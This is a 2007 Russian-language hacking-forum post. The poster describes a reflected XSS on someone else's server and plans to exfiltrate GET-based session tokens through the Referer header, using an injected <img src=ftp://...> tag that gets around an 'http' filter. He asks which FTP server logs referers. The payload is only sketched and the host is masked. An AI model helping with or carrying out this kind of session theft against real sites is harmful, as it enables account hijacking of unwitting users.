HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Протиснуться через пассивную Xss
  #1  
Старый 02.07.2007, 14:37
Alexus
Участник форума
Регистрация: 05.10.2006
Сообщений: 109
С нами: 10314910

Репутация: 28
Question Протиснуться через пассивную Xss

Извиняюсь за возможно лёгкий вопрос заранее.
Нашёл в одном из интересующих менЯ серверов пассивную XSS, coockie сервер не использует , да они мне и ненужны , тк данные сесии идут через адресную строку get запросом в переменной $a. ХSS не имеет ограничений по количеству символов . Я решил , что если сделать в XSS так <img src=http://******> то браузер обратится к моему серверу и я получу значение refer . Но скрипт каким-то образом фильтрует слово http((( однако на ftp спокойно пустил(<img src=ftp://*****>).Я пробовал смотреть логи Golden Ftp Server , но там нет , использовал FTP сервер встроеный в Small http Server . Но там тоже этого не нашёл . Пожалуйста подскажите или какой-нибудь другой способ или ftp сервер пишущий в лог поле рефер .
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Broken image, при использовании XSS через аватару Qwazar PHP 8 15.04.2006 09:02



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.